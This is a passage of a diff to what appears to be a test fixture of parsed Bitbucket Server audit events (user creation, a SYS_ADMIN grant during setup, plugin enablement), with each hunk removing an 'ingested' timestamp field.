completed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"new\\\":true,\\\"old\\\":false}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"SERVER_IS_SETUP\"}]}", "type": "info", "kind": "event" 
@@ -1848,7 +1823,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.globalpermissiongranted", - "ingested": "2021-12-24T00:37:18.867705664Z", "original": "{\"timestamp\":\"2021-11-27T17:34:26.108Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.globalpermissiongranted\",\"action\":\"Global permission granted\"},\"affectedObjects\":[{\"name\":\"admin\",\"type\":\"USER\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"id\":\"2\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"name\":\"Permission\",\"value\":\"SYS_ADMIN\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"permission\\\":\\\"SYS_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"Global\"}]}", "type": "info", "kind": "event" 
@@ -1922,7 +1896,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.globalpermissiongrantrequested", - "ingested": "2021-12-24T00:37:18.867706621Z", "original": "{\"timestamp\":\"2021-11-27T17:34:26.019Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.globalpermissiongrantrequested\",\"action\":\"Global permission requested\"},\"affectedObjects\":[{\"name\":\"admin\",\"type\":\"USER\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"id\":\"2\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"name\":\"Permission\",\"value\":\"SYS_ADMIN\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"permission\\\":\\\"SYS_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"Global\"}]}", "type": "info", "kind": "event" 
@@ -2003,7 +1976,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:18.867707611Z", "original": "{\"timestamp\":\"2021-11-27T17:34:25.313Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"action\":\"User added to user group\"},\"affectedObjects\":[{\"name\":\"stash-users\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=stash-users\",\"id\":\"stash-users\"},{\"name\":\"admin\",\"type\":\"USER\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"id\":\"2\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"name\":\"Parent group\",\"value\":\"stash-users\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"entities\\\":[\\\"admin\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"stash-users\"}]}", "type": [ "group", 
@@ -2082,7 +2054,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.usercreated", - "ingested": "2021-12-24T00:37:18.867708499Z", "original": "{\"timestamp\":\"2021-11-27T17:34:24.078Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercreated\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"admin\",\"type\":\"USER\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"id\":\"2\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"admin\"}]}", "type": [ "user", @@ -2148,7 +2119,6 @@ }, "event": { "action": "bitbucket.service.license.audit.action.licensechanged", - "ingested": "2021-12-24T00:37:18.867709514Z", "original": "{\"timestamp\":\"2021-11-27T17:31:41.984Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"category\":\"Global administration\",\"actionI18nKey\":\"bitbucket.service.license.audit.action.licensechanged\",\"action\":\"Product license changed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"System\"}]}", "type": "info", "kind": "event" 
@@ -2216,7 +2186,6 @@ }, "event": { "action": "bitbucket.service.applicationconfiguration.audit.action.baseurlchanged", - "ingested": "2021-12-24T00:37:18.867710499Z", "original": "{\"timestamp\":\"2021-11-27T17:31:41.375Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"category\":\"Global administration\",\"actionI18nKey\":\"bitbucket.service.applicationconfiguration.audit.action.baseurlchanged\",\"action\":\"Base URL changed\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Base URL\",\"i18nKey\":\"bitbucket.service.applicationconfiguration.audit.changedvalue.baseurlchanged.baseurl\",\"to\":\"http://bitbucket.internal:7990\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"new\\\":\\\"http://bitbucket.internal:7990\\\",\\\"old\\\":null}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"BASE_URL\"}]}", "type": "info", "kind": "event" 
@@ -2241,7 +2210,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867711391Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.694Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"tac.bitbucket.languages.ja_JP\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0.rc1-202111050047\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"tac.bitbucket.languages.ja_JP\"}]}", "type": "info", "kind": "event" @@ -2295,7 +2263,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867712381Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.688Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"tac.bitbucket.languages.fr_FR\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0.rc1-202111050047\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"tac.bitbucket.languages.fr_FR\"}]}", "type": "info", "kind": "event" 
@@ -2349,7 +2316,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867713333Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.681Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"tac.bitbucket.languages.de_DE\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0.rc1-202111050047\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"tac.bitbucket.languages.de_DE\"}]}", "type": "info", "kind": "event" @@ -2403,7 +2369,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867714509Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.674Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.springsource.net.jcip.annotations-1.0.0\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.springsource.net.jcip.annotations-1.0.0\"}]}", "type": "info", "kind": "event" 
@@ -2457,7 +2422,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867715459Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.672Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.zdu.bitbucket-zdu-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.1.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.zdu.bitbucket-zdu-plugin\"}]}", "type": "info", "kind": "event" @@ -2511,7 +2475,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867716389Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.560Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.webhooks.atlassian-webhooks-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.1.6\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.webhooks.atlassian-webhooks-plugin\"}]}", "type": "info", "kind": "event" 
@@ -2565,7 +2528,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867717338Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.557Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.troubleshooting.plugin-bitbucket\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.33.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.troubleshooting.plugin-bitbucket\"}]}", "type": "info", "kind": "event" 
@@ -2619,7 +2581,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867718304Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.502Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.stash.plugins.stash-remote-event-bitbucket-server-spi\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.9.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.stash.plugins.stash-remote-event-bitbucket-server-spi\"}]}", "type": "info", "kind": "event" 
@@ -2673,7 +2634,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867719252Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.491Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.soy.soy-template-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"5.1.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.soy.soy-template-plugin\"}]}", "type": "info", "kind": "event" @@ -2727,7 +2687,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867720214Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.477Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.prettyurls.atlassian-pretty-urls-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"3.0.3\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.prettyurls.atlassian-pretty-urls-plugin\"}]}", "type": "info", "kind": "event" 
@@ -2781,7 +2740,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867721478Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.472Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.static-assets-url\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.0.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.static-assets-url\"}]}", "type": "info", "kind": "event" 
@@ -2835,7 +2793,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867722416Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.450Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.shortcuts.atlassian-shortcuts-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.3.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.shortcuts.atlassian-shortcuts-plugin\"}]}", "type": "info", "kind": "event" 
@@ -2889,7 +2846,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867723346Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.439Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.less-transformer-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.less-transformer-plugin\"}]}", "type": "info", "kind": "event" @@ -2943,7 +2899,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867724349Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.216Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.jquery\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.2.4.11-c72c117\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.jquery\"}]}", "type": "info", "kind": "event" 
@@ -2997,7 +2952,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867725486Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.214Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.issue-status-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.1.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.issue-status-plugin\"}]}", "type": "info", "kind": "event" @@ -3051,7 +3005,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867726445Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.212Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.cleanup-hub-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0.7\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.cleanup-hub-plugin\"}]}", "type": "info", "kind": "event" 
@@ -3105,7 +3058,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867727460Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.203Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.browser.metrics.browser-metrics-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.browser.metrics.browser-metrics-plugin\"}]}", "type": "info", "kind": "event" 
@@ -3159,7 +3111,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867728413Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.201Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.authentication.atlassian-authentication-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.2.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.authentication.atlassian-authentication-plugin\"}]}", "type": "info", "kind": "event" 
@@ -3213,7 +3164,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867729411Z", "original": "{\"timestamp\":\"2021-11-27T17:29:51.049Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-remote-event-producer-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.3.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-remote-event-producer-plugin\"}]}", "type": "info", "kind": "event" 
@@ -3267,7 +3217,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867730486Z", "original": "{\"timestamp\":\"2021-11-27T17:29:51.037Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-remote-event-consumer-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.3.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-remote-event-consumer-plugin\"}]}", "type": "info", "kind": "event" 
